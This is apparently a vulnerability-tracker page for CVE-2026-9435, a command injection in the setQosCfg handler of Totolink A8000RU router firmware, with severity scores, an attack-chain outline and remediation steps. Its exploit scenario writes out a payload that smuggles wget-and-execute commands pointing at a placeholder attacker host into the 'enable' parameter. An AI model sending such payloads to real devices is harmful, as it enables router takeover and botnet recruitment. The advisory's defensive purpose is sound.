Skip to main content

Totolink A8000RU CVE-2026-9435

| EUVD-2026-31643 HIGH
OS Command Injection (CWE-78)
2026-05-25 VulDB GHSA-hjr7-w257-wr94
Command Injection A8000Ru
8.9
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
8.9 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

3
Analysis Generated
Jun 08, 2026 - 09:16 vuln.today
Severity Changed
May 26, 2026 - 19:07 NVD
CRITICAL HIGH
CVSS changed
May 26, 2026 - 19:07 NVD
9.8 (CRITICAL) 8.9 (HIGH)

DescriptionCVE.org

A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. The affected element is the function setQosCfg of the file /cgi-bin/cstecgi.cgi of the component Web Management Interface. Performing a manipulation of the argument enable results in os command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used.

AnalysisAI

OS command injection in Totolink A8000RU router firmware 7.1cu.643_b20200521 allows remote unauthenticated attackers to execute arbitrary operating system commands by manipulating the 'enable' parameter sent to the setQosCfg function of /cgi-bin/cstecgi.cgi in the Web Management Interface. Publicly available exploit code exists per VulDB submission, and the SSVC framework rates technical impact as total with automatable exploitation, though EPSS probability remains modest at 0.89%.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify exposed A8000RU web UI
Delivery
Send crafted POST to /cgi-bin/cstecgi.cgi
Exploit
Inject shell metacharacters in enable parameter
Install
setQosCfg invokes shell with payload
C2
Download and execute attacker binary
Execute
Persist via firmware/cron modification
Impact
Enlist device in botnet or pivot into LAN
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The attacker must be able to reach the router's web management interface (HTTP/HTTPS on the LAN by default, or WAN if 'Remote Management' has been enabled by the operator) and the device must be running the specific firmware build 7.1cu.643_b20200521. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals point toward a high-priority issue for any organization or household actually running this device: the CVSS 4.0 vector AV:N/AC:L/AT:N/PR:N/UI:N with VC:H/VI:H/VA:H means network-reachable, no authentication, no user interaction, and full confidentiality/integrity/availability impact, while SSVC flags exploitation as 'poc', automatable=yes, and technical impact total - a combination that typically warrants prioritized action. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker on the same network as the router (or on the internet if remote management is exposed) sends a single crafted HTTP POST to /cgi-bin/cstecgi.cgi invoking the setQosCfg handler with an 'enable' value containing shell metacharacters such as `;wget http://attacker/x -O /tmp/x;sh /tmp/x;`, causing the router to fetch and execute attacker code as the embedded webserver user (typically root on these devices). With publicly available PoC code on GitHub (Litengzheng/vuldb_new2) and SSVC automatable=yes, the path from discovery to full device takeover and addition to a botnet (a common outcome for compromised Totolink hardware) is essentially scriptable.
Remediation No vendor-released patch identified at time of analysis - Totolink has not published a firmware update referenced in any of the available sources, so administrators should check https://www.totolink.net/ for a newer firmware release for the A8000RU and apply it as soon as one is available. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify all Totolink A8000RU routers running firmware 7.1cu.643_b20200521 in production; isolate affected devices from the network or power down; review network logs for HTTP/HTTPS access to /cgi-bin/cstecgi.cgi. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-9435 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy